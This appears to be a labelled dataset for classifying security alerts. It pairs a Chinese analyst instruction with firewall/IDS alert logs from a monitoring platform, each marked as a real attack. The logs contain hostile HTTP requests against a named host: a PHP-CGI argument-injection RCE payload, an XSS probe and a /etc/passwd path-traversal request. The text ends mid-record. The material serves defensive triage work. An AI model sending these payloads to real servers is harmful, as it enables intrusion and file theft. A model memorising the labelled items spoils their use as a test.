"文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "public_date": "2018-08-20 18:32:27", "sport": 7999}, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "file_md5": "26bdeba127ea52f040c116037c5823a6", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/{filename}", "first_access_time": "2024-11-27 00:08:06", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现脚本文件上传行为", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "d3fc6f33d63981c0412df0ae3b870109", "xff": "", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "attack_chain": "0x02010000", "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637267", "code_language": "通用", "public_date": "2018-08-20 18:32:27", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "5", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055e", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "发现脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHAuY2dpPyUyRCU2NCslNjElNkMlNkMlNkYlNzclNUYlNzUlNzIlNkMlNUYlNjklNkUlNjMlNkMlNzUlNjQlNjUlM0QlNkYlNkUrJTJEJTY0KyU3MyU2MSU2NiU2NSU1RiU2RCU2RiU2NCU2NSUzRCU2RiU2NiU2NislMkQlNjQrJTczJTc1JTY4JTZGJTczJTY5JTZFJTJFJTczJTY5JTZEJTc1JTZDJTYxJTc0JTY5JTZGJTZFJTNEJTZGJTZFKyUyRCU2NCslNjQlNjklNzMlNjElNjIlNkMlNjUlNUYlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlNzMlM0QlMjIlMjIrJTJEJTY0KyU2RiU3MCU2NSU2RSU1RiU2MiU2MSU3MyU2NSU2NCU2OSU3MiUzRCU2RSU2RiU2RSU2NSslMkQlNjQrJTYxJTc1JTc0JTZGJTVGJTcwJTcyJTY1JTcwJTY1JTZFJTY0JTVGJTY2JTY5JTZDJTY1JTNEJTcwJTY4JTcwJTNBJTJGJTJGJTY5JTZFJTcwJTc1JTc0KyUyRCU2NCslNjMlNjclNjklMkUlNjYlNkYlNzIlNjMlNjUlNUYlNzIlNjUlNjQlNjklNzIlNjUlNjMlNzQlM0QlMzArJTJEJTY0KyU2MyU2NyU2OSUyRSU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCU1RiU3MyU3NCU2MSU3NCU3NSU3MyU1RiU2NSU2RSU3NiUzRCUzMCslMkQlNkUgSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUsYnINCkNvbnRlbnQtTGVuZ3RoOiA0Mw0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_c04f5e65fb1d1cf53fd14204f45f923e", "access_time": "2024-11-27 00:08:06", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php.cgi", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567902-发现脚本文件上传行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7999", "h_url": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637282", "vlan_id": "", "vuln_type": "跨站脚本攻击(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "跨站脚本攻击(XSS)", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "跨站脚本攻击(XSS)", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637282, "vuln_harm": "目标存在跨站脚本攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "", "hit_end": 0, "uri": "/?search=<script>alert(1)</script>", "dport": 80, "vuln_name": "跨站脚本攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n方案二:使用开源的漏洞防护插件。具体可以参考:https://github.com/SpiderLabs/ModSecurity", "hit_start": 0, "detail_info": "存在跨站脚本攻击", "xff": "", "sip": "124.239.114.146", "vuln_desc": "存在跨站脚本攻击", "public_date": "2020-11-25 19:46:07", "sport": 7937}, "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n方案二:使用开源的漏洞防护插件。具体可以参考:https://github.com/SpiderLabs/ModSecurity", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/c2VhcmNoPTxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4gSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "存在跨站脚本攻击", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:08:02", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "跨站脚本攻击(机器学习)", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "c2bbedd85e92feebc757515321a73714", "proto": "http", "xff": "", "alarm_id": "20241127_13ff7a63acf89718c6f09cd2a0bad95e", "vuln_desc": "存在跨站脚本攻击", "attack_chain": "0x02010000", "access_time": "2024-11-27 00:08:02", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16050000", "vuln_harm": "目标存在跨站脚本攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637265", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2020-11-25 19:46:07", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?search=<script>alert(1)</script>", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6c", "req_header": "GET /?search=<script>alert(1)</script> HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569452-跨站脚本攻击(机器学习)", "rule_labels": "{}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7937", "h_url": "/?search=<script>alert(1)</script>", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637278", "vlan_id": "", "vuln_type": "发现尝试请求Linux下敏感文件", "rule_version_str": "3.0.1122.14572", "attack_type": "默认配置不当", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "配置不当/错误", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637278, "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 299, "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dport": 80, "vuln_name": "发现尝试请求Linux下敏感文件", "rsp_status": 0, "code_language": "其他", "solution": "对此类敏感请求进行拦截。", "hit_start": 279, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "public_date": "2018-08-30 16:27:11", "sport": 7876}, "solution": "对此类敏感请求进行拦截。", "hit_start": "279", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/cGFnZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkJTAwLmpwZyBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlLGJyDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:07:58", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现尝试请求Linux下敏感文件", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "51440f84d9467a5717f8514a0bc1e00e", "proto": "http", "xff": "", "alarm_id": "20241127_946fdfc95ac6e266c4b6646d9492b7ab", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "page": "../../../../../../../../../etc/passwd\u0000.jpg", "attack_chain": "0x01020000", "access_time": "2024-11-27 00:07:58", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "160C0000", "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637256", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2018-08-30 16:27:11", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "299", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020571", "req_header": "GET /?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567921-发现尝试请求Linux下敏感文件", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7876", "h_url": "/?page=../../../../../../../../../etc/passwd%00.jpg", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637278", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "rule_version_str": "3.0.1122.14572", "attack_type": "目录遍历", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "目录遍历", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637278, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 299, "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dport": 80, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 279, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "124.239.114.146", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 7876}, "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "279", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/cGFnZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkJTAwLmpwZyBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlLGJyDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:07:58", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "33bc11c95ce88c2d0efbcc6610323056", "proto": "http", "xff": "", "alarm_id": "20241127_295c3bb524ec2563e7c38fc3a715992f", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "page": "../../../../../../../../../etc/passwd\u0000.jpg", "attack_chain": "0x02010000", "access_time": "2024-11-27 00:07:58", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "160B0000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637256", "code_language": "通用", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2018-08-16 18:57:22", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "299", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002055d", "req_header": "GET /?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7876", "h_url": "/?page=../../../../../../../../../etc/passwd%00.jpg", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637267", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732637267, "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 47, "uri": 